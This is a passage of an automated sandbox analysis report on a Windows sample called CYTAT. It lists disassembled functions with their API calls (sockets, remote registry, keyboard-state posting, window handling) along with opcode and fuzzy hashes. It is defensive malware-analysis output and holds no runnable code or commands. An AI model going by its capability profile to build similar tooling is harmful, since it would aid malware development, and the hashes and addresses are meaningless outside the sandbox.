                                                • __dosmaperr.LIBCMT ref: 004152A9
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                • String ID:
                                                • API String ID: 3638380555-0
                                                • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$Copy$ClearErrorInitLast
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 3207048006-625585964
                                                • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                • gethostbyname.WSOCK32(?), ref: 004655A6
                                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                • _memmove.LIBCMT ref: 004656CA
                                                • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                • WSACleanup.WSOCK32 ref: 00465762
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                • String ID:
                                                • API String ID: 2945290962-0
                                                • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                • String ID:
                                                • API String ID: 1457242333-0
                                                • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ConnectRegistry_memmove_wcslen
                                                • String ID:
                                                • API String ID: 15295421-0
                                                • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • _wcstok.LIBCMT ref: 004675B2
                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                • _wcscpy.LIBCMT ref: 00467641
                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                • _wcslen.LIBCMT ref: 00467793
                                                • _wcslen.LIBCMT ref: 004677BD
                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                • String ID: X
                                                • API String ID: 780548581-3081909835
                                                • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                • CloseFigure.GDI32(?), ref: 0044751F
                                                • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                • String ID:
                                                • API String ID: 4082120231-0
                                                • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                • String ID:
                                                • API String ID: 2027346449-0
                                                • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                • GetMenu.USER32 ref: 0047A703
                                                • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                • _wcslen.LIBCMT ref: 0047A79E
                                                • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                • String ID:
                                                • API String ID: 3257027151-0
                                                • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorLastselect
                                                • String ID:
                                                • API String ID: 215497628-0
                                                • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32(?), ref: 0044443B
                                                • GetKeyboardState.USER32(?), ref: 00444450
                                                • SetKeyboardState.USER32(?), ref: 004444A4
                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32(?), ref: 00444633
                                                • GetKeyboardState.USER32(?), ref: 00444648
                                                • SetKeyboardState.USER32(?), ref: 0044469C
                                                • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                • String ID:
                                                • API String ID: 2354583917-0
                                                • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
